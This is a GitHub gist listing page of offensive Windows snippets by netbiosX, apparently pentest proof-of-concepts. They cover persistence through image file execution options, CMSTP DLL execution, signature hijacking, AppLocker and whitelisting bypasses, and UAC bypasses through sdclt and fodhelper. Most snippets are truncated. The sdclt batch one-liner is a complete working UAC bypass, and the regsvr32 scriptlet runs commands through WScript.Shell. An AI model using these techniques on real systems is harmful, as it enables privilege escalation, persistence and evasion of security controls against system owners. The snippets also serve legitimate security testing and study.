Skip to content

Instantly share code, notes, and snippets.

🎯
Focusing

netbiosX netbiosX

🎯
Focusing
Block or report user

Report or block netbiosX

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@netbiosX
netbiosX / ImageFileExecutionOptions.ps1
Last active Jan 14, 2020
Image File Execution Options Injection - Persistence Technique
View ImageFileExecutionOptions.ps1
<#
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/
function Persist-Debugger
@netbiosX
netbiosX / pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
View pentestlab-dll.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
@netbiosX
netbiosX / DigitalSignature-Hijack.ps1
Last active May 23, 2019
Hijack Digital Signatures and Bypass Authenticode Hash Validation
View DigitalSignature-Hijack.ps1
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
@netbiosX
netbiosX / customers.xml
Created Jul 5, 2017
Bypass Application Whitelisting via msxsl binary
View customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@netbiosX
netbiosX / Sdclt.ps1
Last active Jul 31, 2019
Bypass UAC via sdclt in Windows 10 systems
View Sdclt.ps1
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
@netbiosX
netbiosX / sdclt.bat
Created Jun 9, 2017
UAC Bypass in Windows 10 via sdclt - batch version
View sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
@netbiosX
netbiosX / FodhelperUACBypass.ps1
Last active Feb 19, 2020
Bypass UAC via Fodhelper binary in Windows 10 systems
View FodhelperUACBypass.ps1
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
@netbiosX
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@netbiosX
netbiosX / pentestlab.sct
Created May 10, 2017
AppLocker - Regsvr32
View pentestlab.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");
You can’t perform that action at this time.